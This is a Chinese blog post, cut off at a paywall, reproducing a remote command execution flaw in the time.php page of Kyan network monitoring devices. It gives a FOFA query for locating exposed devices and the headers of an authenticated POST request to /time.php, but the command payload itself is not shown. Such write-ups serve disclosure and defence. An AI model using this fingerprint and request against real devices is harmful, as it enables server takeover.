Kyan网络监控设备time.php远程命令执行漏洞

今天晚上早睡觉

已于 2024-03-11 21:40:21 修改

阅读量45

点赞数

分类专栏：漏洞复现文章标签： web安全

于 2024-03-11 21:40:00 首次发布

本文链接：https://blog.csdn.net/weixin_43567873/article/details/136636171

版权

漏洞复现专栏收录该内容

360 篇文章 150 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

Kyan网络监控设备的time.php存在远程命令执行漏洞，未经充分验证即可执行任意命令。配合潜在的账号密码泄露，攻击者可能获取服务器权限。修复建议包括更新官方发布的补丁进行系统升级。

摘要由CSDN通过智能技术生成

漏洞描述
Kyan 网络监控设备 time.php 可在身份验证的情况下执行任意命令, 配合账号密码泄露漏洞，可以获取服务器权限，存在远程命令执行漏洞
fofa
app=”Kyan设计”
漏洞复现
登陆后访问/time.php，构造数据包执行命令

POST /time.php HTTP/1.1
Host: 
Content-Length: 26
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=
Connection: close

了解本专栏